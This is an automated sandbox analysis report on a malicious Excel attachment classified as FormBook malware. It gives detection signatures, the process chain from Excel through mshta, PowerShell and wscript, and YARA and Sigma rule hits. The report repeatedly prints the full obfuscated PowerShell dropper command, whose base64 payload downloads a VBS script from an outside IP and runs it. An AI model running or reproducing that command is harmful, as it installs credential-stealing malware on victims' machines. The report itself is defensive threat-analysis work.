Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PI#0034250924.xla.xlsx

Overview

General Information

Sample name:PI#0034250924.xla.xlsx
Analysis ID:1522509
MD5:7e28f8cffffe2ee9420b3ea7915101a4
SHA1:83f9b8f410ed49d2de8fcee1d3659deb8d06adcf
SHA256:2319aa2adb90c44bec9ad97f567b060722bdf5084e7f9b43c65b0feaee993227
Tags:xlaxlsxuser-abuse_ch
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
.NET source code contains potential unpacker
Allocates memory in foreign processes
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Injects a PE file into a foreign processes
Installs new ROOT certificates
Machine Learning detection for dropped file
Machine Learning detection for sample
Microsoft Office drops suspicious files
PowerShell case anomaly found
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious command line found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file does not import any functions
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: AspNetCompiler Execution
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Excel Network Connections
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 3188 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • mshta.exe (PID: 3496 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
      • cmd.exe (PID: 3608 cmdline: "C:\Windows\system32\cmd.exe" "/c pOWeRSHelL.eXE -ex ByPASs -NoP -W 1 -C DEvICEcREdenTialDEPlOymenT ; Iex($(iEX('[sYsTEM.TexT.EnCODiNg]'+[ChAR]0x3A+[cHAr]58+'UtF8.gETstRING([SySTem.COnVERT]'+[chAR]0X3A+[cHAR]58+'FROMBase64StrinG('+[chAr]34+'JGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYkVyZEVmSW5pdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZanNPcXBMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdKclV3aSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3ZLcGpXbFBZLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFBGalB6KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieXJabWN4d09YbiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRkpNd0h4ZUdIICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRiOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA0LjE2OC43LjcvMzU2L0lFbmV0Ym9va3VwZGF0aW9uLnZicyIsIiRlTnY6QVBQREFUQVxFbmV0Ym9va3VwZGF0aW9uLnZicyIsMCwwKTtzVGFSVC1TTGVFcCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcRW5ldGJvb2t1cGRhdGlvbi52YnMi'+[ChAr]34+'))')))" MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
        • powershell.exe (PID: 3632 cmdline: pOWeRSHelL.eXE -ex ByPASs -NoP -W 1 -C DEvICEcREdenTialDEPlOymenT ; Iex($(iEX('[sYsTEM.TexT.EnCODiNg]'+[ChAR]0x3A+[cHAr]58+'UtF8.gETstRING([SySTem.COnVERT]'+[chAR]0X3A+[cHAR]58+'FROMBase64StrinG('+[chAr]34+'JGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYkVyZEVmSW5pdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZanNPcXBMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdKclV3aSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3ZLcGpXbFBZLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFBGalB6KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieXJabWN4d09YbiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRkpNd0h4ZUdIICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRiOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA0LjE2OC43LjcvMzU2L0lFbmV0Ym9va3VwZGF0aW9uLnZicyIsIiRlTnY6QVBQREFUQVxFbmV0Ym9va3VwZGF0aW9uLnZicyIsMCwwKTtzVGFSVC1TTGVFcCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcRW5ldGJvb2t1cGRhdGlvbi52YnMi'+[ChAr]34+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
          • csc.exe (PID: 3752 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ao24xfvf\ao24xfvf.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
            • cvtres.exe (PID: 3760 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB8B5.tmp" "c:\Users\user\AppData\Local\Temp\ao24xfvf\CSC75A1BB69F3FE4BED81ABA0ECFBA99BE.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • wscript.exe (PID: 3852 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Enetbookupdation.vbs" MD5: 045451FA238A75305CC26AC982472367)
            • temp_exec.exe (PID: 3920 cmdline: "C:\Users\user\AppData\Local\Temp\temp_exec.exe" MD5: 77733FB5B16FC7AE0944C92FD2E89D7E)
              • aspnet_compiler.exe (PID: 3948 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: A1CC6D0A95AA5C113FA52BEA08847010)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000D.00000002.536381146.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    0000000D.00000002.536381146.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2ea43:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x16d42:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    0000000D.00000002.536316311.0000000000230000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      0000000D.00000002.536316311.0000000000230000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2b950:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x13c4f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      13.2.aspnet_compiler.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        13.2.aspnet_compiler.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
        • 0x2ea43:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0x16d42:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        13.2.aspnet_compiler.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          13.2.aspnet_compiler.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2dc43:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x15f42:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: File With Uncommon Extension Created By An Office Application
          Source: File createdAuthor: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3188, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\IEnetbookupdateion[1].hta
          Sigma detected: Potentially Suspicious PowerShell Child Processes
          Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Enetbookupdation.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Enetbookupdation.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: pOWeRSHelL.eXE -ex ByPASs -NoP -W 1 -C DEvICEcREdenTialDEPlOymenT ; Iex($(iEX('[sYsTEM.TexT.EnCODiNg]'+[ChAR]0x3A+[cHAr]58+'UtF8.gETstRING([SySTem.COnVERT]'+[chAR]0X3A+[cHAR]58+'FROMBase64StrinG('+[chAr]34+'JGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYkVyZEVmSW5pdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZanNPcXBMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdKclV3aSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3ZLcGpXbFBZLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFBGalB6KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieXJabWN4d09YbiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRkpNd0h4ZUdIICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRiOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA0LjE2OC43LjcvMzU2L0lFbmV0Ym9va3VwZGF0aW9uLnZicyIsIiRlTnY6QVBQREFUQVxFbmV0Ym9va3VwZGF0aW9uLnZicyIsMCwwKTtzVGFSVC1TTGVFcCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcRW5ldGJvb2t1cGRhdGlvbi52YnMi'+[ChAr]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3632, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Enetbookupdation.vbs" , ProcessId: 3852, ProcessName: wscript.exe
          Sigma detected: Suspicious MSHTA Child Process
          Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\system32\cmd.exe" "/c pOWeRSHelL.eXE -ex ByPASs -NoP -W 1 -C DEvICEcREdenTialDEPlOymenT ; Iex($(iEX('[sYsTEM.TexT.EnCODiNg]'+[ChAR]0x3A+[cHAr]58+'UtF8.gETstRING([SySTem.COnVERT]'+[chAR]0X3A+[cHAR]58+'FROMBase64StrinG('+[chAr]34+'JGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYkVyZEVmSW5pdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZanNPcXBMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdKclV3aSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3ZLcGpXbFBZLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFBGalB6KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieXJabWN4d09YbiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRkpNd0h4ZUdIICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRiOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA0LjE2OC43LjcvMzU2L0lFbmV0Ym9va3VwZGF0aW9uLnZicyIsIiRlTnY6QVBQREFUQVxFbmV0Ym9va3VwZGF0aW9uLnZicyIsMCwwKTtzVGFSVC1TTGVFcCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcRW5ldGJvb2t1cGRhdGlvbi52YnMi'+[ChAr]34+'))')))", CommandLine: "C:\Windows\system32\cmd.exe" "/c pOWeRSHelL.eXE -ex ByPASs -NoP -W 1 -C DEvICEcREdenTialDEPlOymenT ; Iex($(iEX('[sYsTEM.TexT.EnCODiNg]'+[ChAR]0x3A+[cHAr]58+'UtF8.gETstRING([SySTem.COnVERT]'+[chAR]0X3A+[cHAR]58+'FROMBase64StrinG('+[chAr]34+'JGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYkVyZEVmSW5pdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZanNPcXBMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdKclV3aSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3ZLcGpXbFBZLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFBGalB6KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieXJabWN4d09YbiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgR
          Sigma detected: Suspicious Microsoft Office Child Process
          Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\System32\mshta.exe -Embedding, CommandLine: C:\Windows\System32\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3188, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\System32\mshta.exe -Embedding, ProcessId: 3496, ProcessName: mshta.exe
          Sigma detected: WScript or CScript Dropper
          Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Enetbookupdation.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Enetbookupdation.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: pOWeRSHelL.eXE -ex ByPASs -NoP -W 1 -C DEvICEcREdenTialDEPlOymenT ; Iex($(iEX('[sYsTEM.TexT.EnCODiNg]'+[ChAR]0x3A+[cHAr]58+'UtF8.gETstRING([SySTem.COnVERT]'+[chAR]0X3A+[cHAR]58+'FROMBase64StrinG('+[chAr]34+'JGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYkVyZEVmSW5pdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZanNPcXBMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdKclV3aSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3ZLcGpXbFBZLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFBGalB6KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieXJabWN4d09YbiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRkpNd0h4ZUdIICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRiOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA0LjE2OC43LjcvMzU2L0lFbmV0Ym9va3VwZGF0aW9uLnZicyIsIiRlTnY6QVBQREFUQVxFbmV0Ym9va3VwZGF0aW9uLnZicyIsMCwwKTtzVGFSVC1TTGVFcCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcRW5ldGJvb2t1cGRhdGlvbi52YnMi'+[ChAr]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3632, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Enetbookupdation.vbs" , ProcessId: 3852, ProcessName: wscript.exe
          Sigma detected: AspNetCompiler Execution
          Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\temp_exec.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\temp_exec.exe, ParentProcessId: 3920, ParentProcessName: temp_exec.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", ProcessId: 3948, ProcessName: aspnet_compiler.exe
          Sigma detected: Dynamic .NET Compilation Via Csc.EXE
          Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ao24xfvf\ao24xfvf.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ao24xfvf\ao24xfvf.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: pOWeRSHelL.eXE -ex ByPASs -NoP -W 1 -C DEvICEcREdenTialDEPlOymenT ; Iex($(iEX('[sYsTEM.TexT.EnCODiNg]'+[ChAR]0x3A+[cHAr]58+'UtF8.gETstRING([SySTem.COnVERT]'+[chAR]0X3A+[cHAR]58+'FROMBase64StrinG('+[chAr]34+'JGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYkVyZEVmSW5pdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZanNPcXBMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdKclV3aSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3ZLcGpXbFBZLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFBGalB6KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieXJabWN4d09YbiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRkpNd0h4ZUdIICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRiOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA0LjE2OC43LjcvMzU2L0lFbmV0Ym9va3VwZGF0aW9uLnZicyIsIiRlTnY6QVBQREFUQVxFbmV0Ym9va3VwZGF0aW9uLnZicyIsMCwwKTtzVGFSVC1TTGVFcCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcRW5ldGJvb2t1cGRhdGlvbi52YnMi'+[ChAr]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3632, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ao24xfvf\ao24xfvf.cmdline", ProcessId: 3752, ProcessName: csc.exe
          Sigma detected: Excel Network Connections
